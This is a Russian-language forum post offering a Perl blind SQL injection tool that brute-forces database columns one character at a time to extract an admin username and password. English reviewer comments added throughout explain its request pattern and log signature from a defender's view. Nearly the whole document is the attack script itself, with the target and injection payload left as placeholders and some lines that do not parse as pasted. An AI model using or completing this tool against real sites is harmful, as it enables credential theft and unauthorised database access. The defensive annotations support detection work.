
Вот пример сплоита , заюзай тока со своей скулей!
Код:
#!/usr/bin/perl -w
use IO::Socket;
use strict;
#
# Benchmark brute sql tool
#
# NOTE(review): as posted, this is a blind SQL injection character
# brute-forcer; it is kept here unchanged for analysis. From a defender's
# view, sploit() below issues one HTTP GET per candidate character, so a
# long run of sequential requests to one path with percent-encoded query
# strings is the pattern that shows up in access logs.
#
# Delay value; it is overridden from the third command-line argument below
# but is not read anywhere else in the visible code.
my $delay = "80000";
# Set to 1 when a character is found; sploit() uses it to leave the
# candidate loop and resets it to 0.
my $stp =0;
# NOTE(review): the dashes and text after the `;` on the next two lines are
# not Perl comment syntax, so the script as pasted does not parse under
# `use strict`.
my $host = ""; -------урл хоста
my $dir = ""; ------директория
if ($ARGV[2] ) { $delay = $ARGV[2]; }
print "\nTarget url : ".$host.$dir."\n\n";
# Strip a leading "http://" so $host can be used as a PeerAddr.
$host =~ s/(http:\/\/)//;
# Two column names; sploit() overwrites each entry with the recovered text.
# NOTE(review): the trailing dashes and text here are not a Perl comment.
my @array = ("username","password"); ---название columns в бд
print "--== Trying to perform sql injection ==--\n\n";
sleep(1);
# Called with the discouraged `&name()` form; plain `sploit();` is the
# idiomatic call.
&sploit();
# sploit(): the brute-force loop. For each entry of @array it guesses one
# character at a time by sending one HTTP GET per candidate byte and looking
# for the string "Subquery returns more than" in the response; the guessed
# text then replaces the entry in @array. Takes no arguments; reads the
# file-level $host, $dir, @array and $stp. Exits the whole process on a
# "404 Not Found" or "400 Bad Request" response line. The empty `()`
# prototype is not argument validation.
#
# Defender's note: the only signal this relies on is a raw database error
# message echoed in the HTTP response body. An application that does not
# return DB error text to clients removes that signal, and the per-character
# request pattern (many GETs to one path in quick succession, each with a
# percent-encoded query string) is what to look for in logs.
sub sploit() {
my $x = "";
my $i = "";
# Characters recovered so far for the current @array entry.
my $string = "";
# 1 while the last pass found a character; 0 ends the `while` below.
my $res = "1";
for ( $x=0; $x<=$#array; $x++ ) {
# $j is incremented at the end of each pass but never read.
my $j = 1;
$res = 1;
while ($res) {
# Candidate bytes are ASCII 32..127.
for ($i=32;$i<=127;$i++) {
$res = 0;
# String comparison (`eq`) against a numeric loop index. For the
# second entry only ASCII 48-57 and 97-102 (0-9, a-f) are tried.
if ( $x eq 1 ) {
next if ( $i < 48 );
next if ( ( $i > 57 ) and ( $i < 97 ) );
next if ( $i > 102 );
}
# Placeholder literals left exactly as posted (Russian text); nothing in
# the visible code fills them in.
my $val = "пУТЬ ДО СКУЛИ ВИДА (index.php?id=1')";
my $tmp = "И САМА СКУЛЮ ДЛЯ ПЕРЕБОРА";
# Percent-encode every byte that is not an ASCII letter or digit.
$tmp =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
$val .= $tmp;
my $data=$dir.$val;
my $start = time();
# A fresh TCP connection to port 80 for every candidate; dies if it fails.
my $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Error - connection failed\n\n";
# Hand-built HTTP/1.1 request with a fixed Firefox 1.5 User-Agent; note
# that both "Connection: Keep-Alive" and "Connection: close" are sent.
print $req "GET $data HTTP/1.1\r\n";
print $req "Host: $host\r\n";
print $req "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 (GNU Linux)\r\n";
print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
print $req "Accept-Language: en-us;q=0.7,en;q=0.3\r\n";
print $req "Accept-Encoding: gzip,deflate\r\n";
print $req "Keep-Alive: 300\r\n";
print $req "Connection: Keep-Alive\r\n";
print $req "Cache-Control: no-cache\r\n";
print $req "Connection: close\r\n\r\n";
# Scan the response line by line; $req is never closed explicitly.
while (my $result = <$req>) {
# The oracle: a MySQL error message in the response line is treated as
# a hit for this candidate byte.
if ( $result =~ /Subquery returns more than/ ) {
$string .= chr($i);
print "\n\tFound : ".chr($i)."\n\n";
$res = 1;
$stp=1;
}
# Any 404 or 400 status text aborts the whole run.
if ( $result =~ /404 Not Found/ ) {
printf "\n\nFile not found.\n\n";
print "\n\n$result\n\n";
exit;
}
if ( $result =~ /400 Bad Request/ ) {
printf "\n\nBad request.\n\n";
print "\n\n$result\n\n";
exit;
}
}
# A character was found: stop trying further candidates for this position.
if($stp > 0)
{
$stp=0;
last;
}
# Elapsed time for this request, whole-second resolution from time().
my $end = time();
my $dft = $end - $start;
print "$dft sec ";
print "\tTrying : ".chr($i)."\n";
}
$j++;
# No candidate matched in the last pass: the entry is complete. Store it
# in place of the column name and reset the accumulator.
if ( !$res ) {
$array[$x] = $string;
$string = "";
}
}
}
print "\n----------------------\n";
print "Admin username : $array[0]\n";
print "Admin password : $array[1]\n\n";
}
# usage(): prints a banner (mostly blank lines plus "ay" and "by fly") and
# exits with status 0. It is not called anywhere in the visible script, and
# it does not describe the command-line arguments. The empty `()` prototype
# is not argument validation.
sub usage() {
print "\n \n";
print " \n";
print " \n\n";
print "ay\n";
print "by fly\n\n";
exit();
}